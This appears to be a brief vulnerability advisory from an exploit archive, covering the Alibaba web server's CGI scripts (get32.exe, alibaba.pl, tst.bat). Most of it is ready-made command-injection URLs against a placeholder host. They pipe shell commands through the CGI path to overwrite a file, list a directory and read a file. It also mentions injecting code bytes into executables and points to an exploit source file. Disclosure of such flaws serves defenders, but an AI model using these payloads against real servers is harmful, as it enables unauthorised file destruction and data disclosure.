Alibaba Multiple CGI Vulnerabilties

Alibaba Multiple CGI Vulnerabilties

http ://victim.com/cgi-bin/get32.exe|echo%20>c:\file.txt
This will overwrite file.txt, or any file you specify. The get32.exe program will also allow the injection of code bytes into any executable file.

http ://www.victim.com/cgi-bin/alibaba.pl|dir
This will provide a directory listing of the CGI directory.

http ://www.victim.com/cgi-bin/tst.bat|type%20c:\file.txt
This will display the contents of file.txt

/data/vulnerabilities/exploits/AlibabaFileOverwriteXploit.c
/data/vulnerabilities/exploits/